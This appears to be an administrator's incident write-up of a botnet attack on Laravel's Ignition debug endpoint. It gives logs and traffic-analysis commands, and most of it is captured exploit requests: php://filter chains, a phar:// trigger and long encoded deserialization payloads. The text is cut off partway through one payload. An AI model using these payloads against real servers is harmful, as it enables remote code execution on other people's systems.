- Dimas Maulana·Last edited by Dimas Maulana on Aug 4, 2023Linked with GitHubContributed by
Recently, there have been several hacking attempts on websites I manage that use Laravel as their framework. I contacted my friend, and he mentioned a similar case at a company where his friend works. Based on this, I assume that this is a global attack, using a botnet or automated tool to target websites worldwide.
The attackers managed to successfully attempt Remote Code Execution on the website I manage. However, there is no evidence of them accessing other resources except my reverse proxy and php-fpm services. I believe this is because the bot only placed a backdoor for the attacker to check later.
In this article, I will share how I discovered the hacking method used by the attackers.
Detecting Bot Attacks on My Website: How Did I Find Out?
As a Security Enthusiast, I take security seriously and often disable certain functions in the php.ini config, such as the snippet below:
; This directive allows you to disable certain functions.
; It receives a comma-delimited list of function names.
; https://php.net/disable-functions
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
However, despite these precautions, I was alarmed to discover some attempts to access the shell_exec() function from php://input in my php-fpm log. This incident raised concerns about the security of my setup.
php-fpm.log
[03-Aug-2023 07:47:46 UTC] PHP Fatal error: Uncaught Error: Call to undefined function shell_exec() in php://input:1
Stack trace:
#0 {main}
thrown in php://input on line 1
[03-Aug-2023 19:23:53 UTC] PHP Fatal error: Uncaught Error: Call to undefined function shell_exec() in php://input:1
Stack trace:
#0 {main}
thrown in php://input on line 1
[03-Aug-2023 19:23:54 UTC] PHP Fatal error: Uncaught Error: Call to undefined function shell_exec() in php://input:1
Stack trace:
#0 {main}
thrown in php://input on line 1
[03-Aug-2023 19:23:55 UTC] PHP Fatal error: Uncaught Error: Call to undefined function shell_exec() in php://input:1
Stack trace:
#0 {main}
thrown in php://input on line 1
[03-Aug-2023 23:22:23 UTC] PHP Fatal error: Uncaught Error: Call to undefined function shell_exec() in php://input:1
Stack trace:
#0 {main}
thrown in php://input on line 1
[04-Aug-2023 02:54:42 UTC] PHP Fatal error: Uncaught Error: Call to undefined function system() in php://input:1
Stack trace:
#0 {main}
thrown in php://input on line 1
This discovery has prompted me to investigate further and take additional measures to enhance the security of my system.
Unveiling Suspicious Activity
Checking The NGINX Log
109.237.96.251 - - [03/Aug/2023:23:22:24 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.770 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:22:43 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 933623 "http://51.161.84.3:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 17.902 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:22:43 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.243 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:22:46 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 1011414 "http://51.161.84.3:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 1.195 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:22:58 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.223 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:08 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 1011414 "http://51.161.84.3:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 8.906 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:12 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.231 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:13 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 1011413 "http://51.161.84.3:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.712 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:15 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.227 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:17 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 1011414 "http://51.161.84.3:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.718 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:20 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 1.154 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:22 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 1011420 "http://51.161.84.3:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.711 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:24 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.234 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:27 +0000] "GET /_ignition/execute-solution HTTP/1.1" 405 1011414 "http://51.161.84.3:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 2.102 req_body:"-"
109.237.96.251 - - [03/Aug/2023:23:23:30 +0000] "POST /_ignition/execute-solution HTTP/1.1" 301 175 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 0.221 req_body:"-"
You can setup log like this by add this to your nginx configuration
log_format log_req_resp '$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" $request_time req_body:"$request_body"'; access_log /var/www/html/storage/logs/nginx_home.log log_req_resp;
In the provided nginx log, we can observe that an IP address (109.237.96.251) made multiple attempts to access the /_ignition/execute-solution endpoint. After researching, it appears that this endpoint is used in Laravel to execute test functions or classes. Unfortunately, attackers often exploit this functionality to gain Remote Code Execution (RCE) on vulnerable systems, as demonstrated in this article: Exploiting Laravel v8.30.0 (PHP v7.3.25) Debug RCE.
The attacker's attempts were likely targeting the debug mode in Laravel, which is enabled when the APP_DEBUG parameter in the .env file is set to true.
Analyzing Network Traffic
However, something seems fishy - there are no request bodies captured in my logs, right? To investigate further, I decided to capture network traffic using the tcpdump command, as shown below:
nohup sudo tcpdump -i <your_interface> -nn -s 0 -w dump.dump
After waiting for several hours, the bot attacked again. This time, I used the tshark command to capture HTTP traffic and data from IP address 109.237.96.251.
tshark -r dump.dump -Y "http.request and ip.addr==109.237.96.251" -T fields -e http.file_data
output:
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "aa"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=49=00=42=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=44=00=53=00=42=00=41=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=63=00=6A=00=6F=00=79=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6C=00=4E=00=70=00=65=00=6D=00=55=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4F=00=44=00=6B=00=30=00=4F=00=69=00=4A=00=6C=00=59=00=32=00=68=00=76=00=49=00=44=00=42=00=69=00=5A=00=44=00=63=00=35=00=4F=00=54=00=42=00=68=00=49=00=43=00=59=00=6D=00=49=00=47=00=56=00=6A=00=61=00=47=00=38=00=67=00=53=00=58=00=6C=00=46=00=64=00=6C=00=6C=00=74=00=62=00=48=00=56=00=4D=00=4D=00=6B=00=70=00=6F=00=59=00=7A=00=4A=00=6E=00=53=00=32=00=4E=00=48=00=64=00=48=00=42=00=69=00=52=00=33=00=64=00=6E=00=54=00=46=00=64=00=5A=00=5A=00=32=00=56=00=75=00=54=00=6A=00=4A=00=5A=00=64=00=33=00=42=00=33=00=59=00=54=00=4A=00=73=00=63=00=32=00=4A=00=44=00=51=00=58=00=52=00=61=00=61=00=55=00=4A=00=33=00=57=00=6B=00=64=00=57=00=62=00=56=00=70=00=58=00=4E=00=57=00=74=00=61=00=57=00=45=00=70=00=72=00=51=00=32=00=35=00=43=00=63=00=6D=00=46=00=58=00=65=00=48=00=4E=00=4A=00=51=00=7A=00=46=00=74=00=53=00=55=00=68=00=57=00=64=00=31=00=70=00=48=00=52=00=6A=00=42=00=61=00=56=00=30=00=35=00=76=00=57=00=6C=00=64=00=4F=00=63=00=6C=00=70=00=59=00=53=00=6D=00=74=00=44=00=5A=00=33=00=42=00=74=00=5A=00=46=00=63=00=31=00=61=00=6D=00=52=00=48=00=62=00=48=00=5A=00=69=00=61=00=55=00=4A=00=6D=00=57=00=44=00=4A=00=4F=00=4D=00=57=00=4E=00=74=00=64=00=32=00=39=00=4C=00=55=00=30=00=49=00=33=00=51=00=32=00=6C=00=42=00=5A=00=32=00=4E=00=74=00=56=00=6D=00=68=00=61=00=51=00=30=00=4A=00=33=00=59=00=32=00=30=00=35=00=4D=00=47=00=4A=00=35=00=51=00=6E=00=70=00=61=00=57=00=45=00=6F=00=79=00=57=00=6C=00=68=00=4A=00=5A=00=32=00=4E=00=48=00=52=00=6A=00=42=00=68=00=51=00=30=00=45=00=34=00=55=00=45=00=52=00=33=00=61=00=30=00=74=00=48=00=56=00=6D=00=70=00=68=00=52=00=7A=00=68=00=6E=00=53=00=6B=00=68=00=7A=00=65=00=45=00=78=00=35=00=4F=00=48=00=5A=00=4D=00=65=00=55=00=49=00=35=00=53=00=31=00=46=00=76=00=5A=00=30=00=6C=00=46=00=55=00=6C=00=42=00=52=00=65=00=6A=00=42=00=32=00=53=00=6B=00=68=00=30=00=64=00=31=00=6C=00=59=00=55=00=6D=00=39=00=4D=00=65=00=54=00=68=00=6E=00=54=00=48=00=6B=00=35=00=4F=00=55=00=4E=00=70=00=51=00=57=00=64=00=54=00=52=00=54=00=6C=00=55=00=56=00=6B=00=51=00=77=00=61=00=32=00=55=00=7A=00=54=00=6D=00=78=00=6A=00=62=00=6C=00=70=00=73=00=59=00=32=00=6B=00=34=00=64=00=6B=00=39=00=70=00=63=00=44=00=6C=00=44=00=61=00=55=00=46=00=6E=00=56=00=55=00=55=00=35=00=55=00=31=00=5A=00=45=00=4D=00=47=00=74=00=6C=00=4D=00=30=00=35=00=73=00=59=00=32=00=35=00=61=00=62=00=47=00=4E=00=70=00=4F=00=48=00=5A=00=4C=00=61=00=6E=00=41=00=35=00=51=00=32=00=6C=00=42=00=5A=00=31=00=63=00=78=00=63=00=32=00=64=00=6C=00=51=00=30=00=6C=00=72=00=5A=00=54=00=42=00=6F=00=55=00=46=00=55=00=78=00=55=00=6A=00=6C=00=4A=00=61=00=55=00=45=00=35=00=55=00=46=00=4E=00=43=00=4E=00=45=00=6C=00=70=00=55=00=6A=00=64=00=56=00=52=00=54=00=6C=00=54=00=56=00=6B=00=67=00=77=00=61=00=55=00=6C=00=47=00=4D=00=57=00=52=00=4A=00=51=00=31=00=6C=00=74=00=53=00=55=00=5A=00=43=00=55=00=46=00=56=00=73=00=55=00=54=00=6C=00=50=00=52=00=45=00=46=00=4C=00=51=00=32=00=6C=00=42=00=5A=00=31=00=70=00=59=00=61=00=47=00=78=00=5A=00=65=00=55=00=46=00=36=00=55=00=45=00=51=00=30=00=64=00=6C=00=70=00=48=00=56=00=6A=00=4A=00=4D=00=4D=00=31=00=4A=00=71=00=59=00=30=00=4D=00=34=00=61=00=32=00=55=00=77=00=61=00=46=00=42=00=56=00=4D=00=56=00=49=00=35=00=54=00=48=00=6C=00=53=00=55=00=56=00=51=00=78=00=53=00=6C=00=56=00=44=00=61=00=55=00=46=00=6E=00=57=00=6C=00=64=00=4F=00=62=00=32=00=4A=00=35=00=51=00=58=00=52=00=61=00=56=00=7A=00=52=00=6E=00=53=00=57=00=74=00=6B=00=52=00=6C=00=5A=00=44=00=51=00=57=00=74=00=6C=00=4D=00=46=00=4A=00=51=00=55=00=54=00=4D=00=77=00=5A=00=31=00=4E=00=47=00=55=00=6C=00=56=00=56=00=51=00=7A=00=68=00=34=00=54=00=47=00=70=00=43=00=59=00=32=00=4E=00=73=00=65=00=48=00=56=00=54=00=52=00=7A=00=6C=00=36=00=5A=00=45=00=52=00=76=00=5A=00=30=00=70=00=49=00=64=00=45=00=6C=00=55=00=4D=00=55=00=35=00=56=00=5A=00=6C=00=5A=00=34=00=65=00=56=00=68=00=48=00=4E=00=57=00=4E=00=6A=00=62=00=48=00=68=00=31=00=53=00=57=00=6C=00=42=00=4B=00=30=00=70=00=71=00=54=00=55=00=74=00=4A=00=51=00=30=00=46=00=76=00=5A=00=44=00=4A=00=6F=00=63=00=47=00=4A=00=48=00=56=00=57=00=64=00=6A=00=62=00=56=00=5A=00=6F=00=57=00=6B=00=4E=00=43=00=63=00=32=00=46=00=58=00=4E=00=57=00=78=00=50=00=65=00=55=00=4A=00=72=00=59=00=6E=00=64=00=76=00=5A=00=30=00=6C=00=44=00=51=00=6D=00=4A=00=58=00=65=00=55=00=46=00=70=00=53=00=6B=00=64=00=34=00=63=00=47=00=4A=00=74=00=56=00=57=00=6C=00=4A=00=52=00=44=00=41=00=35=00=53=00=55=00=4E=00=52=00=62=00=6C=00=68=00=49=00=53=00=57=00=35=00=4A=00=52=00=6A=00=46=00=6B=00=53=00=55=00=4E=00=5A=00=62=00=55=00=6C=00=48=00=53=00=6E=00=6C=00=61=00=56=00=30=00=5A=00=79=00=51=00=32=00=6C=00=42=00=5A=00=31=00=70=00=48=00=4F=00=58=00=56=00=61=00=55=00=30=00=46=00=74=00=53=00=6D=00=6C=00=43=00=61=00=6C=00=6C=00=59=00=55=00=58=00=42=00=4A=00=52=00=48=00=64=00=74=00=54=00=58=00=64=00=76=00=5A=00=30=00=6C=00=48=00=56=00=6A=00=52=00=61=00=56=00=30=00=31=00=6E=00=54=00=58=00=6F=00=30=00=62=00=55=00=78=00=52=00=63=00=44=00=6C=00=44=00=5A=00=33=00=42=00=77=00=57=00=6D=00=6C=00=43=00=59=00=6B=00=6C=00=44=00=4D=00=54=00=52=00=4A=00=51=00=30=00=6C=00=72=00=53=00=30=00=64=00=4F=00=64=00=6D=00=4A=00=58=00=4D=00=57=00=68=00=69=00=62=00=56=00=46=00=6E=00=54=00=46=00=68=00=5A=00=5A=00=31=00=6B=00=7A=00=56=00=6E=00=6C=00=69=00=51=00=32=00=74=00=70=00=53=00=55=00=59=00=77=00=4E=00=30=00=6C=00=49=00=55=00=6D=00=39=00=61=00=56=00=7A=00=52=00=4C=00=53=00=55=00=4E=00=43=00=61=00=6D=00=52=00=59=00=53=00=6E=00=4E=00=4A=00=52=00=45=00=55=00=31=00=54=00=6B=00=4D=00=30=00=4E=00=45=00=35=00=35=00=4E=00=48=00=6C=00=4F=00=56=00=45=00=6C=00=31=00=54=00=56=00=52=00=56=00=4E=00=55=00=77=00=79=00=65=00=48=00=6C=00=4D=00=62=00=6B=00=35=00=76=00=5A=00=6B=00=64=00=4B=00=61=00=47=00=4D=00=79=00=5A=00=30=00=74=00=61=00=56=00=33=00=68=00=77=00=57=00=6D=00=6C=00=43=00=59=00=6B=00=6C=00=44=00=4D=00=54=00=52=00=4A=00=51=00=30=00=6C=00=72=00=53=00=30=00=64=00=4F=00=64=00=6D=00=4A=00=58=00=4D=00=57=00=68=00=69=00=62=00=56=00=46=00=6E=00=54=00=46=00=68=00=5A=00=5A=00=32=00=51=00=79=00=5A=00=47=00=78=00=6B=00=51=00=32=00=74=00=70=00=53=00=55=00=59=00=77=00=4E=00=30=00=6C=00=49=00=55=00=6D=00=39=00=61=00=56=00=7A=00=52=00=4C=00=53=00=55=00=4E=00=43=00=4D=00=31=00=6F=00=79=00=56=00=6A=00=42=00=4A=00=51=00=7A=00=46=00=34=00=53=00=55=00=4D=00=78=00=55=00=45=00=78=00=54=00=51=00=58=00=68=00=50=00=56=00=46=00=46=00=31=00=54=00=30=00=52=00=6A=00=64=00=55=00=31=00=71=00=56=00=58=00=6C=00=4D=00=61=00=6B=00=55=00=78=00=54=00=31=00=4D=00=35=00=63=00=32=00=4E=00=70=00=4E=00=58=00=70=00=68=00=53=00=48=00=68=00=70=00=57=00=56=00=68=00=4F=00=62=00=30=00=4E=00=74=00=56=00=6E=00=4E=00=6A=00=4D=00=6C=00=56=00=4C=00=53=00=55=00=4E=00=43=00=5A=00=6C=00=67=00=79=00=54=00=6A=00=46=00=6A=00=62=00=58=00=64=00=6E=00=59=00=55=00=68=00=53=00=4D=00=47=00=4E=00=45=00=62=00=33=00=5A=00=4D=00=65=00=6B=00=55=00=31=00=54=00=6B=00=4D=00=30=00=4E=00=45=00=35=00=35=00=4E=00=48=00=6C=00=4F=00=56=00=45=00=6C=00=31=00=54=00=56=00=52=00=56=00=4E=00=55=00=77=00=79=00=65=00=48=00=6C=00=4E=00=61=00=54=00=56=00=36=00=59=00=55=00=68=00=34=00=61=00=56=00=6C=00=59=00=54=00=6D=00=39=00=44=00=62=00=56=00=70=00=77=00=66=00=47=00=4A=00=68=00=63=00=32=00=55=00=32=00=4E=00=43=00=41=00=74=00=5A=00=48=00=78=00=69=00=59=00=58=00=4E=00=6F=00=49=00=43=00=59=00=6D=00=49=00=47=00=56=00=6A=00=61=00=47=00=38=00=67=00=4D=00=47=00=4A=00=6B=00=4E=00=7A=00=6B=00=35=00=4D=00=47=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=32=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=69=00=4F=00=33=00=31=00=39=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=6B=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4F=00=4D=00=4F=00=45=00=59=00=34=00=47=00=76=00=54=00=50=00=48=00=59=00=38=00=66=00=39=00=4F=00=4D=00=30=00=55=00=45=00=72=00=58=00=30=00=53=00=66=00=69=00=41=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "phar://../storage/logs/laravel.log/test.txt"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "aa"\n }\n }
{\n "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\n "parameters": {\n "variableName": "zzzz",\n "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=46=00=42=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=44=00=50=00=42=00=41=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=63=00=6A=00=6F=00=79=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6C=00=4E=00=70=00=65=00=6D=00=55=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4F=00=44=00=6B=00=30=00=4F=00=69=00=4A=00=6C=00=59=00=32=00=68=00=76=00=49=00=44=00=42=00=69=00=5A=00=44=00=63=00=35=00=4F=00=54=00=42=00=68=00=49=00=43=00=59=00=6D=00=49=00=47=00=56=00=6A=00=61=00=47=00=38=00=67=00=53=00=58=00=6C=00=46=00=64=00=6C=00=6C=00=74=00=62=00=48=00=56=00=4D=00=4D=00=6B=00=70=00=6F=00=59=00=7A=00=4A=00=6E=00=53=00=32=00=4E=00=48=00=64=00=48=00=42=00=69=00=52=00=33=00=64=00=6E=00=54=00=46=00=64=00=5A=00=5A=00=32=00=56=00=75=00=54=00=6A=00=4A=00=5A=00=64=00=33=00=42=00=33=00=59=00=54=00=4A=00=73=00=63=00=32=00=4A=00=44=00=51=00=58=00=52=00=61=00=61=00=55=00=4A=00=33=00=57=00=6B=00=64=00=57=00=62=00=56=00=70=00=58=00=4E=00=57=00=74=00=61=00=57=00=45=00=70=00=72=00=51=00=32=00=35=00=43=00=63=00=6D=00=46=00=58=00=65=00=48=00=4E=00=4A=00=51=00=7A=00=46=00=74=00=53=00=55=00=68=00=57=00=64=00=31=00=70=00=48=00=52=00=6A=00=42=00=61=00=56=00=30=00=35=00=76=00=57=00=6C=00=64=00=4F=00=63=00=6C=00=70=00=59=00=53=00=6D=00=74=00=44=00=5A=00=33=00=42=00=74=00=5A=00=46=00=63=00=31=00=61=00=6D=00=52=00=48=00=62=00=48=00=5A=00=69=00=61=00=55=00=4A=00=6D=00=57=00=44=00=4A=00=4F=00